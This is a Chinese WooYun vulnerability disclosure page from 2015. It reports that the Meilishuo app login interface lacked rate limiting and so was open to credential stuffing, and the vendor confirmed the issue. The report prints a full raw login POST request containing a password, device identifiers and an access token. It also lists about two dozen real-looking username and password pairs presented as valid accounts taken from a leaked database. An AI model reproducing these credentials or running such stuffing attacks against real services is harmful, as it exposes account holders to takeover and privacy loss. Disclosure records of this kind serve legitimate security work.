当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108389

漏洞标题:美丽说某接口撞库泄露用户账号(有批量账号证明)

相关厂商:美丽说

漏洞作者: 路人甲

提交时间:2015-04-16 16:17

修复时间:2015-06-01 11:46

公开时间:2015-06-01 11:46

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:16

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-16: 细节已通知厂商并且等待厂商处理中
2015-04-17: 厂商已经确认,细节仅向厂商公开
2015-04-27: 细节向核心白帽子及相关领域专家公开
2015-05-07: 细节向普通白帽子公开
2015-05-17: 细节向实习白帽子公开
2015-06-01: 细节向公众公开

简要描述:

某接口撞库泄露用户登录凭据(有账号证明)

详细说明:

手机app登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号

POST /2.0/account/login HTTP/1.1
Host: account.meilishuo.com
User-Agent: meilishuo android 14005 6.0.0
Accept-Encoding: gzip, deflate
Connection: close
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 209
username=baixiaoba&password=shmily44&imei=A000004FDE3FA5&mac=58%3A1f%3A28%3A9f%3Aca%3Ac4&qudaoid=14005&access_token=b16722f565d8cb3802aa946dceb9c2d2&st=1429169215&_sign=5e2fa758066cca4b1625c7247ccee1d0de9f246f

漏洞证明:

经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号

zy4334833	zyzy4833
carolinemomo 19890619
qqlwz lwz6967760
audan 11.25audan
Cinderellazhan kittyzhan
yufei4712353 89065328
xiaoxue1989 wujingxue
woaiwangdi woaiwangdi
janery655 janery04023030
chenfeioa 020220oa
cynthiaxk 1985121112
xyz890717 xyz665272xyz
baojiong bao12345
nilanlan nilanlan
aken0820 42142130999
likefunv g19881226q
yaya1202 liuyaya1202
cxtalent chenxin8758
lynnxwt 19871218
vdgame wxq123
tanya007 wenyi775
baixiaoba shmily44
dongwei48135267 48135267
zm7610 mickey99


屏幕快照 2015-04-16 下午3.42.09.png


屏幕快照 2015-04-16 下午3.45.38.png


修复方案:

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-04-17 11:44

厂商回复:

非常感谢您对美丽说安全的关注,经验证该漏洞真实存在,已联系业务部门紧急修复。

最新状态:

暂无